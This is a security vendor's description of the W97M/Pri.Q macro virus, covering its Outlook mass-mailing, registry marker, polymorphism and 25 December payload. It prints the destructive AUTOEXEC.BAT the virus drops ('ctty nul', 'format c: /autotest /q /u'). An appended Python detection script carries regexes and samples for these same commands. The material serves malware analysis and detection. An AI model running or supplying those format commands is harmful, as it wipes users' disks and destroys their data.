Lumension® Endpoint Intelligence Center

Overview

Threat Risk: LOW
Destructivity: MEDIUM
Payload:
Detection files published: 23 Nov 1999 03:00:00
Description created: 23 Nov 1999 03:00:00
Description updated: 23 Nov 1999 03:00:00
Malware type: VIRUS
Alias: W97M/Melissa.X, W97M/Melissa.AG, W97M/Prilissa.A
Spreading mechanism: EMAIL, FILE_INFECTION
Summary: None

W97M/Pri.Q

Spreading

The W97M/Pri.Q virus will start by disabling certain settings. If the virus detects that Office 2000 is in use, it will disable the Macro|Security menu item; otherwise, it assumes Office 97 and will disable the Tools|Macro menu item.

If the Registry key

HKEY_CURRENT_USER\Software\Microsoft\Office\CyberNET

does not equal "(C)1999 - Indonesia by AnomOke!", the virus will e-mail the infected document using Microsoft Outlook to the first 50 entries in the address book.

When the messages are sent, W97M/Pri.Q will set the above-mentioned key in the registry, preventing the virus from sending out another series of infected documents.

After the e-mail session, W97M/Pri.Q will check whether the date is 25 December of any year, in which case it drops its payload. Next, the virus will call its polymorphic routine, which changes its appearance and makes detection difficult for conventional scanners.

Payload Details

Every 25 December W97M/Pri.Q will deliver its payload. First it will overwrite the AUTOEXEC.BAT file in the root directory of drive C: with this content:

@echo off
@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus!!!
ctty nul
format c: /autotest /q /u

The next time the system is rebooted, the hard disk will be formatted and all the information will be wiped.

After dropping the trojanized AUTOEXEC.BAT file, the virus will display this Message Box on the screen:

 
Vine...Vide...Vice...Moslem Power Never End...Yo
p Dare Rise Against Me... The Human Era is Over. The CyberNET Era Has Come !!!This is then followed by a series of different shapes moving on the screen.

Analysis

n/a

Removal

The batch file dropped by the virus will be identified as BAT/Pri.Q.Trojan.
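A triage check for the two artifacts described above (the overwritten AUTOEXEC.BAT and the registry marker), given here as an added example that is not part of the original description and is not the vendor's BAT/Pri.Q.Trojan signature. The function names and sample inputs are constructed for illustration; the heuristic goes slightly beyond this one file by flagging any unattended format command regardless of case or switch order.

```python
import re

# Registry data the description says is written after the mass-mailing run.
MARKER = "(C)1999 - Indonesia by AnomOke!"

# FORMAT on a drive letter with /autotest, which runs without a confirmation prompt.
FORMAT_RE = re.compile(r"^\s*@?\s*format(?:\.com|\.exe)?\s+[a-z]:.*?/autotest\b", re.I)
# CTTY NUL detaches the console, so the user sees nothing while later commands run.
CTTY_RE = re.compile(r"^\s*@?\s*ctty\s+nul\b", re.I)
# Commented-out lines never execute and must not be flagged.
COMMENT_RE = re.compile(r"^\s*@?\s*(rem\b|::)", re.I)


def scan_autoexec(text):
    """Return a list of (line_number, reason) findings for one batch file's text."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if COMMENT_RE.match(line):
            continue
        if FORMAT_RE.match(line):
            findings.append((number, "unattended format"))
        elif CTTY_RE.match(line):
            findings.append((number, "console output suppressed"))
    return findings


def is_destructive(findings):
    """True when at least one finding is an unattended format command."""
    return any(reason == "unattended format" for _, reason in findings)


def marker_present(value):
    """True when data read from the CyberNET key equals the marker string."""
    return value is not None and value.strip() == MARKER


# Constructed samples: the command lines from the listing above (echo lines omitted),
# a harmless file with a commented-out command, and an upper-case reordered variant.
DROPPED = "@echo off\nctty nul\nformat c: /autotest /q /u\n"
BENIGN = "@echo off\nrem format c: /autotest\nformat a: /q\npath c:\\windows\n"
VARIANT = "@FORMAT C: /U /AUTOTEST\n"

if __name__ == "__main__":
    for name, sample in (("dropped", DROPPED), ("benign", BENIGN), ("variant", VARIANT)):
        print(name, scan_autoexec(sample))
```

A marker match means the mass-mailing routine has already run for that user profile, so the Outlook sent items of that account are worth reviewing as well.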


Last Updated: 12 Nov 2015 11:06:10